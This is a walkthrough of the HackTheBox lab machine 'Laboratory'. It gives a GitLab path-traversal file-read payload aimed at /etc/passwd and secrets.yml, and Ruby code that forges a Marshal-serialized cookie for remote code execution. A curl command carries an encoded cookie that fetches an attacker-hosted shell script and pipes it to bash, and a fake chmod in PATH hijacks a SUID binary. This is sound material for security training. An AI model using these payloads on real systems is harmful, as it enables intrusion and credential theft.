Summary

Laboratory an easy box created by Hackthebox user 0xc45.
Initial Foothold was finding a CVE for gitlab which gave us Arbitrary file read Later checking the hackerone thread for this issue we find that this can be converted to an RCE, using which we get the initial shell in a docker container as git.
Enumerating the box i decided to take a gitlab-backup and saw it contain a securedocker repository.
Extracting that we get user ssh key and get user shell.Enumerating the box again as dexter we see an interesting SUID binary.
docker-security So I ran ltrace to see what it is doing and saw it was using chmod but without absolute path. So using PATH hijacking we get a shell as root.

Foothold

nmap

Lets start with a nmap scan

# Nmap 7.80 scan initiated Sun Nov 15 12:17:35 2020 as: nmap -Pn -sC -sV -oN nmap/laboratory 10.10.10.216
Nmap scan report for 10.10.10.216
Host is up (0.077s latency).
Not shown: 997 filtered ports
PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
80/tcp  open  http     Apache httpd 2.4.41
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Did not follow redirect to https://laboratory.htb/
443/tcp open  ssl/http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: The Laboratory
| ssl-cert: Subject: commonName=laboratory.htb
| Subject Alternative Name: DNS:git.laboratory.htb
| Not valid before: 2020-07-05T10:39:28
|_Not valid after:  2024-03-03T10:39:28
| tls-alpn:
|_  http/1.1
Service Info: Host: laboratory.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Nov 15 12:17:59 2020 -- 1 IP address (1 host up) scanned in 23.88 seconds

In the nmap scan we see two domains laboratory.htb and git.laboratory.htb

Lets add that to our host file and visit these site and see what is present on the server

laboratory.htb

I didn’t saw anything interesting here and saw that it a .html static page. So i ran a gobuster and moved to next thing

git.laboratory.htb (Gitlab)

visiting https://git.laboratory.htb/help we see the version as GitLab Community Edition 12.8.1

Checking searchsploit we see that we may have Arbitrary file read

GitLab 12.9.0 - Arbitrary File Read                                                                                                                         | ruby/webapps/48431.txt

Also with some google-fu i found the issue page

Lets try the steps to get the File Read

• Create two Project

  

• Add an issue with the following description:

![a](/uploads/11111111111111111111111111111111/../../../../../../../../../../../../../../etc/passwd)  

And we verify that we can do Arbitrary file read

Now what to read? So back to Google-Fu and found the hackerone thread for the issue.

And saw we can read

![a](/uploads/11111111111111111111111111111111/../../../../../../../../../../../../../../opt/gitlab/embedded/service/gitlab-rails/config/secrets.yml)

for cookie generation

request = ActionDispatch::Request.new(Rails.application.env_config)
request.env["action_dispatch.cookies_serializer"] = :marshal
cookies = request.cookie_jar

erb = ERB.new("<%= `your code` %>")
depr = ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy.new(erb, :result, "@result", ActiveSupport::Deprecation.new)
cookies.signed[:cookie] = depr
puts cookies[:cookie]

So i got a docker running gitlab with

sudo docker run --rm -d -p 4443:443 -p 8090:80 -p 2222:22 --name gitlab gitlab/gitlab-ce:12.8.1-ce.0
sudo docker exec -ti bash
vi /opt/gitlab/embedded/service/gitlab-rails/config/secrets.yml
<put the content of what we got>
gitlab-rails console

and use the above to generate the cookie

and we can use

curl -vvv -k 'https://git.laboratory.htb/users/sign_in' -b "experimentation_subject_id=BAhvOkBBY3RpdmVTdXBwb3J0OjpEZXByZWNhdGlvbjo6RGVwcmVjYXRlZEluc3RhbmNlVmFyaWFibGVQcm94eQk6DkBpbnN0YW5jZW86CEVSQgs6EEBzYWZlX2xldmVsMDoJQHNyY0kiaSNjb2Rpbmc6VVRGLTgKX2VyYm91dCA9ICsnJzsgX2VyYm91dC48PCgoIGBjdXJsIGh0dHA6Ly8xMC4xMC4xNC4xMy9zaGVsbC5zaCB8IGJhc2hgICkudG9fcyk7IF9lcmJvdXQGOgZFRjoOQGVuY29kaW5nSXU6DUVuY29kaW5nClVURi04BjsKRjoTQGZyb3plbl9zdHJpbmcwOg5AZmlsZW5hbWUwOgxAbGluZW5vaQA6DEBtZXRob2Q6C3Jlc3VsdDoJQHZhckkiDEByZXN1bHQGOwpUOhBAZGVwcmVjYXRvckl1Oh9BY3RpdmVTdXBwb3J0OjpEZXByZWNhdGlvbgAGOwpU--94b17553fb6a110472a87df915e1a5765a25219b"

and we get a shell as git

User

Enumerating the box i ran gitlab-backup and saw a repo dexter/securedocker
so i downloaded the backup to my local machine

Using the bundle i cloned that

git clone ../repositories/@hashed/19/58/19581e27de7ced00ff1ce50b2047e7a567c76b1cbaebabe5ef03f7c3017bb5b7.bundle

Checking the repo we find the ssh key for dexter.

Using that we get user

ssh -i ./dexter dexter@laboratory.htb

Root

Running linpeas i saw an interesting file

/usr/local/bin/docker-security

So lets run ltrace and see what that does

ltrace /usr/local/bin/docker-security
setuid(0)                                                                                                            = -1
setgid(0)                                                                                                            = -1
system("chmod 700 /usr/bin/docker"chmod: changing permissions of '/usr/bin/docker': Operation not permitted
 <no return ...>
--- SIGCHLD (Child exited) ---
<... system resumed> )                                                                                               = 256
system("chmod 660 /var/run/docker.sock"chmod: changing permissions of '/var/run/docker.sock': Operation not permitted
 <no return ...>
--- SIGCHLD (Child exited) ---
<... system resumed> )                                                                                               = 256
+++ exited (status 0) +++

Okay that look like a path hijacking attack as it is not using absolute path for chmod

So i did

cd $(mktemp -d)
echo "bash" > chmod
chmod 777 ./chmod
PATH=$(pwd):$PATH docker-security

and we can grab root.txt

and we have pwned Laboratory 💃